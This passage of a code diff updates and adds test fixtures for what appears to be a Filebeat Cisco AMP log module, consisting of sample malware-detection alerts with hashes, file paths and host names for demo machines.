"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "tdss.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 322626, - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "explorer.exe", - "process.pid": 1892, + "log.offset": 64851, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_TDSS" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6403,80 +2711,64 @@ ] }, { - "@timestamp": "2021-01-15T10:09:02.000Z", + "@timestamp": "2021-01-15T10:17:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "5a:ff:4a:a3:8a:2f" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "DFC.CustomIPList", - "cisco.amp.detection_id": "5826709511729053698", - "cisco.amp.event_type_id": 1090519084, + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], - "cisco.amp.network_info.nfm.direction": "Outgoing connection from", - "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "5a:ff:4a:a3:8a:2f" + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 613000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.4.4", - "destination.port": 80, - "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 5826709511729054000, + "event.id": 6159251516445164000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", "fileset.name": "amp", - "host.hostname": "Demo_Tinba", - "host.name": "Demo_Tinba", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 324228, - "network.direction": "egress", - "network.transport": "TCP", - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "Explorer.EXE", - "process.pid": 1600, + "log.offset": 66143, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], "related.hosts": [ - "Demo_Tinba" + "Demo_TeslaCrypt" ], "related.ip": [ - "10.10.0.0", - "8.8.4.4", "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", - "source.ip": "10.10.0.0", - "source.port": 1083, "tags": [ "cisco-amp", "forwarded" - ], - "url.domain": "dak1otavola1ndos.com", - "url.extension": "php", - "url.original": "http://dak1otavola1ndos.com/h/index.php", - "url.path": "/h/index.php", - "url.scheme": "http" + ] } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log new file mode 100644 index 000000000000..4a0581fcd4d6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log @@ -0,0 +1,45 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 